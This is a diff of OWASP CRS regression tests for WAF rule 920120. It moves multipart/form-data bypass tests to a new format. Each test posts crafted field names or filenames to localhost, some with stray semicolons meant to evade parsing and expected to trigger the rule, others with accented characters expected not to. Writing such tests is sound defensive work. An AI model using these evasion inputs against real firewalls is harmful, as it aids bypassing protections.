"920120" - - test_title: 920120-17 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ZZZ;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 17 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="mZ;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-18 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="mZ;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 18 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeiouy]uml;.' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzäëïöüÿÄËÏÖÜŸzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-19 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzäëïöüÿÄËÏÖÜŸzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 19 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[aeiouy]uml;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="äëïöüÿÄËÏÖÜŸzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-20 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="äëïöüÿÄËÏÖÜŸzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 20 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeioucghjswy]circ;.' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzâêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-21 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzâêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 21 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[aeioucghjswy]circ;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="âêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-22 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="âêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 22 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeiouclnrszg]acute;.' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzáéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-23 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzáéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 23 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[aeiouclnrszg]acute;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="áéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-24 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="áéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 24 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeiou]grave;.' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzàèìòùÀÈÌÒÙzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-25 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzàèìòùÀÈÌÒÙzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 25 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[aeiou]grave;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="àèìòùÀÈÌÒÙzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-26 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="àèìòùÀÈÌÒÙzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 26 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[cgklnrst]cedil;.' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-27 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 27 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[cgklnrst]cedil;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-28 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 28 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[anoi]tilde;.' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzãñõĩÃÑÕĨzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-29 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzãñõĩÃÑÕĨzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 29 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[anoi]tilde;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ãñõĩÃÑÕĨzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-30 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ãñõĩÃÑÕĨzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 30 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[cdelnrstz]caron;.' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzčďěľňřšťžČĎĚĽŇŘŠŤŽzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-31 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzčďěľňřšťžČĎĚĽŇŘŠŤŽzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 31 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[cdelnrstz]caron;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="čďěľňřšťžČĎĚĽŇŘŠŤŽzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-32 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="čďěľňřšťžČĎĚĽŇŘŠŤŽzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 32 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[au]ring;.' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzåůÅŮzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-33 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzåůÅŮzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 33 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[au]ring;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="åůÅŮzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-34 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="åůÅŮzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 34 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: ø,&, ,'.' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzøØ&& 'zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-35 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzøØ&& 'zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 35 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[au]ring;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="øØ&& 'zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-36 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="øØ&& 'zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 36 desc: "Attempted multipart/form-data bypass (920120). Still match ; that aren't part of an HTML entity in FILES." stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="&fi;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-37 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="&fi;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 37 desc: "Attempted multipart/form-data bypass (920120). Still match ; that aren't part of an HTML entity in FILES_NAMES." stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="test"; filename="&fi;zzz" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-38 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="test"; filename="&fi;zzz" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 38 desc: "Attempted multipart/form-data bypass (920120). Don't match ; that are part of HTML entities in both FILES and FILES_NAMES." stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzz&zzz"; filename="zzz&zzz" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-39 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzz&zzz"; filename="zzz&zzz" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 39 desc: "Attempted multipart/form-data bypass (920120). Allow empty fields." stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name=""; filename="" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: 